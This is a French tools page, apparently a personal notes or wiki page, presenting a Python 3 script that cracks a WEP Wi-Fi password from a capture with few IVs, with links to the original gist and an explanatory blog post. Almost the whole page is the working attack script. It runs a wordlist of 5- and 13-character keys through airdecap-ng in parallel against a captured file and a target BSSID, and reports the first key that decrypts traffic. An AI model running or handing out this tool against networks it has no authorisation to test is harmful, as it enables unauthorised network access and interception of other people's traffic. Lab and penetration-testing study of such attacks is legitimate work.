Outils
Cracker un mot de passe wep avec un nombre d'IV peu important.
https://gist.github.com/tbhaxor/170894df0d43fd23eae49b0b20442c27
Script
Python 3
import re
import sys
import subprocess
import os
import uuid
from binascii import hexlify
from concurrent.futures import ThreadPoolExecutor
# check the required parameters in the argv list
if len(sys.argv) < 4:
print("usage: %s <password file> <capture file> <bssid>" % sys.argv[0], file=sys.stderr)
sys.exit(1)
def do_crack(ascii: bytes, key: bytes, pool: ThreadPoolExecutor):
sys.stdout.write("\033[K")
print("[!] Trying key", ascii.decode(), end="\r")
# generate output file name
outfile = uuid.uuid1().hex + ".cap"
# call the airdecap with key, bssid, output file and capture file (params in order)
output = subprocess.check_output(["/usr/bin/airdecap-ng",
"-w", key,
"-b", sys.argv[3],
"-o", outfile,
sys.argv[2]],
stderr=subprocess.DEVNULL)
# transform the output in the list
output_decoded = output.decode()
output_list = output_decoded.strip().split("\n")
# iterate list to check for "decrypted WEP" string in it
for entry in output_list:
if entry.count("decrypted WEP") > 0:
# check the last word, if it is not equal to 0, thefore key crack is successful
# print the key and the decrypted file name
# shutdown the thread pool and cancel futures
# exit the main process with exit code 0
words = entry.split(" ")
if int(words[-1]) != 0:
sys.stdout.write("\033[K")
print("\r[!] Found: ", ascii.decode())
print("[!] Decrypted file: ", outfile)
pool.shutdown(wait=False, cancel_futures=True)
sys.exit(0)
else:
# unlink the file failed to decrypt
os.unlink(outfile)
pass
# handle RuntimeError error for unexpected pool shutdown
# handle all other errors in second expect block
try:
# create the thread pool executor with max 5 workers (you can increase it too)
# open the file in read-binary format from first argument
with ThreadPoolExecutor(max_workers=5) as pool, open(sys.argv[1], "rb") as file:
for line in file:
# remove the whitespaces like \r or \n or both
line = line.strip()
# if the key is 40 bits or 104 bits submit to do_crack function after
# converting the binary string to hex like "echo key | xxd -ps"
if len(line) == 5 or len(line) == 13:
key = hexlify(line)
pool.submit(do_crack, line, key, pool)
except RuntimeError:
sys.exit(0)
except Exception as e:
print("Unexpected failure: %s" % e)
sys.exit(1)
Exemple d'usage
En pratique :
Note
Attention à bien choisir sa liste de mot de passe.
Présentation et explication d'une attaque
https://tbhaxor.com/decrypt-wep-traffic-with-insufficient-ivs/